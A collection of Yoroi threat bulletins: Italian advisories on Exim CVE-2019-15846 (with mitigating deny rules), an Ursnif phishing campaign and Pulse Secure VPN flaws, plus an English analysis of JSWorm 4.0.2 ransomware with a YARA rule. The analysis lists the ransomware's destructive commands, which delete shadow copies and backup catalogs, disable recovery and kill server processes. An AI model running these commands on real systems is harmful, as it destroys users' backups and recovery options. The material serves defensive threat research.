This article was authored by Antonio Farina, Davide Testa and Antonio Pirozzi  of Cybaze-Yoroi Z-LAB.

Falla in Server di Posta Exim

Proto: N030919.

Con la presente Yoroi desidera informarLa riguardo al rilevamento di una vulnerabilità critica in Exim, server di posta open-source utilizzato da aziende, provider di servizio e produttori di tecnologie. La criticità è nota con l’identificativo CVE-2019-15846.

La problematica è causata da lacune nella gestione della terminazione del Server Name Indication (SNI) durante le fasi di instaurazione del canale di comunicazione cifrato TLS (e.g. SMTPS o IMAPS), attraverso le quali un attaccante remoto può eseguire codice arbitrario con privilegi amministrativi all’interno del server bersaglio.

Il Manutentore ha pubblicato un apposito bollettino di sicurezza e confermato la problematica per tutte le versioni di Exim inclusa la 4.92.1, rilasciando la versione 4.92.2 in grado di risolvere la problematica e le seguenti regole ACL di blocco in grado di mitigare i vettori di attacco al momento conosciuti:

deny    condition = ${if eq{\\}{${substr{-1}{1}{$tls_in_sni}}}}
deny    condition = ${if eq{\\}{${substr{-1}{1}{$tls_in_peerdn}}}}

Il Manutentore specifica inoltre che la problematica non è originata dalle librerie di crittografia utilizzate dal server di posta, ma bensì dalla logica applicativa di Exim stesso.

Per via della potenziale esposizione internet delle tecnologie afflitte e della disponibilità di dettagli tecnici legati alla problematica, Yoroi consiglia caldamente di pianificare l’installazione degli aggiornamenti a disposizione ed applicare le mitigazioni suggerite dal Manutentore.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

Ondata di Attacchi Contro Aziende Italiane (Ursnif)

Proto: N020919.

Con la presente Yoroi desidera informarLa riguardo al rilevamento di una pericolosa campagna di attacco in corso ai danni di utenti ed Aziende italiane. I messaggi di posta inviati dai cyber criminali contengono riferimenti a ipotetici documenti e fatture fittizie, ed invitano la vittima ad aprire un foglio Excel in grado di infettare la macchina con un impianto malware della famiglia Ursnif (TH-124), minaccia in grado di intercettare digitazioni da tastiera, trafugare le password salvate ed alterare la navigazione web utente.

Figura. Esempio documento malevolo

Di seguito si riportano gli indicatori di compromissione estratti durante le analisi condotte:

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index

JSWorm: The 4th Version of the Infamous Ransomware

Introduction

The ransomware attacks have no end. These cyber weapons are supported by a dedicated staff that constantly update and improve the malware in order to make harder detection and decryption. As the popular GandCrab, which was carried on up to version 5 until its shutdown, also other ransomware are continuously supported with the purpose of creating revenues for cyber criminals. One of them is JSWorm, which has been updated to version 4. 

Despite the name could reminds to JavaScript language and a possible “worm” logic, the malware does not include either of the two characteristics.

Technical Analysis

Hash46761b8b727f3002d1c73fa6c8568ebcf2ec0066666251f66dcda9d4268e03e8
ThreatJSWorm
Brief DescriptionJSWorm 4.0.2
Ssdeep3072:77LlFWt1yDzVwq4wk+KdXqSmT9C8Fi7FvSJv+R1Y:77a2XC9+KBJmT9BihSlw+

Table 1: Information about JSWorm 4.0.2 version

JSWorm encrypts all the user files appending a new extension to their name. Unlike other ransomware, the extension is composed by many fields, reporting the information the user needs to move on the ransom payment phase. These fields are the same shown in the ransom note, that are: "Filename.originalExtension.[Infection_ID][Attacker_email].JSWRM"

Figure 1: Infection ID and Contact E-mail 

Moreover, in the ransom note there is also a backup email, “[email protected], to ensure availability in case of blacklisting. During the encryption phase, the ransomware creates an HTML Application “JSWRM-DECRYPT.hta” in each folder it encounters. The HTA file corresponds to the ransom window shown in Figure 1.

To ensure the correct machine functionalities, the ransomware excludes from the encryption phase several system directories (Windows, Perflogs) and junction points like Document and Settings, $RECYCLE.BIN, System Volume Information, MSOCache. Also, for each encountered file, the malware compares it with the excluded paths and if they match, a conditional jump is taken.

Figure 2: Excluded paths

Unlike most ransomware, JSWorm does not embed a list of file extensions to encrypt, but uses a set of extensions to exclude during the cipher step. The malware encrypts all the files whose extension is not present in the list.

Figure 3: Extensions excluded from encryption

Figure 4: Content of “key” file contained in “C:\ProgramData”

During the encryption phase, JSWorm writes a suspicious file named “key.Infection_ID.JSWRM” in “C:\ProgramData”. It contains the AES key used to encrypt the files. Unfortunately, the key is processed with an additional RSA encryption step before its storing. The following figure shows an example of the encrypted key. 

Moreover, to maximize the impact of the encryption phase, the ransomware:

The commands invoked by JSWorm to perform the above mentioned actions are:

vssadmin.exe delete shadows /all /quietDelete the Shadow Volume Copies
bcdedit /set {default} bootstatuspolicy ignoreallfailures -yDisable Windows Error Recovery on startup
bcdedit /set {default} recoveryenabled No -yDisable Automatic Startup Repair
wbadmin delete catalog -quietDelete the backup catalog
wmic shadowcopy delete -yAnother attempt to delete the Shadow Volume Copies
/c reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "zapiska" /d "C:\ProgramData\JSWRM-DECRYPT.txt" -ySet persistence on startup
/c taskkill.exe taskkill /f /im store.exeKill “store.exe” process (related to MS Exchange)
/c taskkill.exe taskkill /f /im sqlserver.exeKill “sqlserver.exe” process
/c taskkill.exe taskkill /f /im dns.exeKill “dns.exe” process
/c taskkill.exe taskkill /f /im sqlwriter.exeKill “sqlwriter.exe” process

Table 2: Commands executed by the malware

An example of how the malware invokes the commands using the “ShellExecuteA” API is shown in the following figure.

Figure 5: Disassembled routine for shadow copies deleting

The Encryption Scheme

The AES key the malware encrypt is generated starting from an embedded Base64 seed “MI2i6BWRFhcswznItBEl33UaIoDOwqI=”, which is converted into a byte array through CryptStringToBinaryA API before proceeding with low-level manipulation.

Figure 6: Embedded initial string used to generate AES key

The fixed string is combined with a random one to make the derived AES key different for each infection. Not even the malware writer knows the final AES key to decrypt the files, so when the user asks to recover his files, he must send the key file stored in “C:\ProgramData”. On the other side, the attacker will receive the file, then he will decrypt the content using his private RSA key and will proceed to extract the AES key useful to decrypt the user files.

To encrypt the AES key, JSWorm uses an RSA public key embedded into it in Base64 form, as shown in the following figure.

Figure 7: RSA-1 public key in Base 64 encoding (on the left) and in binary encoding (on the right)

The control flow used to encrypt the AES key is based on Windows Cryptography API, as visible in the following figure.

Figure 8: Entire control flow to encrypt the AES key

After decoding of RSA public key and the initialization of a new PROV_RSA_FULL cryptographic service provider (CSP) through the “CryptAcquireContextA” function, the ransomware import the decoded RSA key using the “CryptImportKey” API. 

Figure 9: Imported RSA key through “CryptImportKey” API

The last step is the encryption routine, which is done using the “CryptEncrypt” function, as shown in the following figure.

Figure 10: Parameters for the “CryptEncrypt” function

A funny piece of the malware code is the Russian string used to instantiate a new mutex, “kto prochtet tot sdohnet =)” which means “who reads will die =)”.

Figure 11: Mutex creation

Conclusion

The analyzed case has features in common with most ransomware like encryption scheme, the deletion of shadow copy and persistence. About the encryption scheme, the ransomware uses an AES key generated starting from an embedded Base64 seed which is converted into a byte array through CryptStringToBinaryA API. It is very common to find Ransomware relying on this library (CryptoAPI) for cryptographic task mainly for reliability and for reducing time for development.

Another interesting element is the presence of a mutex containing the string “kto prochtet tot sdohnet =)” in Russian language. This leads us to think that the authors could have Russian hands. Obviously, this could also be a false flag, but the Russian underground have a long tradition in such kind of cyber-crime activities: in fact, according to an Anton Ivanov research, senior malware analyst at Kaspersky Lab, even back in 2016 the Russian underground gave birth to about the 75% of the new crypto-ransomware tracked in that year, evidence of a consolidated malware writing capability.

Indicator of Compromise

Yara Rule

rule JSWorm_4.0.2_July_2019 {
    meta:
      description = "Yara rule for JSWorm 4.0.2"
      author = "Yoroi - ZLab"
      last_updated = "2019-08-27"
      tlp = "white"
   	 category = "informational"
    strings:
   	 $a1 = "Total size of files must be less than 5MB"
   	 $a2 = "BORw0KGgoAAAANSU"
   	 $a3 = {FA 39 2E 3A 3A 3A 41 3A 68}
   	 $a4 = {19 38 12 39 2E 39 26 3A}
   	 $a5 = {32 DC 32 F0 32 0C 33}
   	 $a6 = "vssadmin.exe"
   	 $a7 = "wmic shadowcopy"
   	 $a8 = "MI2i6BWRFhcs"
   	 $a9 = {4D CC 2B C1 83 F8}
   	 $a10 = {FF 83 C8 FF 5D C3 8B 40}
    condition:
   	 4 of ($a*)
}

This blog post was authored by Antonio Farina, Davide Testa and Antonio Pirozzi.

Vulnerabilità su Appliance Pulse Secure

Proto: N010919.

Con la presente Yoroi desidera informarLa riguardo al rilevamento di gravi vulnerabilità all’interno delle tecnologie Pulse Secure, appliance di sicurezza diffuso in ambiti Enterprise per la realizzazione di Gateway VPN. Le principali criticità sono note con gli identificativi CVE-2019-11510, CVE-2019-11539 e CVE-2019-11542.

A causa di varie lacune nella gestione degli input utente, risulta possibile per un attaccante di rete non autenticato scaricare file e configurazioni arbitrari dell'appliance Pulse Secure bersaglio. A seguito dello sfruttamento, l’attaccante remoto può essere in grado di recuperare utenze necessarie allo sfruttamento di ulteriori vulnerabilità all’interno dei moduli di diagnostica e di vari altri moduli interni, tali da permettergli l’esecuzione di codice arbitrario sul sistema.

Il Produttore ha confermato le problematiche attraverso il bollettino SA44101, rilasciando opportuni aggiornamenti per le versioni:

Per via della potenziale esposizione internet degli appliance vulnerabili e del recente rilascio di dettagli tecnici e Proof-of-Concept atti a replicare le vulnerabilità, Yoroi consiglia di verificare lo stato di aggiornamento degli eventuali dispositivi Pulse esposti ad internet e di applicare le patch di sicurezza messe a disposizione dal Produttore.

Yoroi consiglia infine di mantenere alto il livello di consapevolezza degli utenti, avvisandoli periodicamente delle minacce in corso e di utilizzare un team di esperti per salvaguardare la sicurezza del perimetro "cyber". Per avere un indice di minaccia in tempo reale si consiglia di visitare il seguente link: Yoroi Cyber Security Index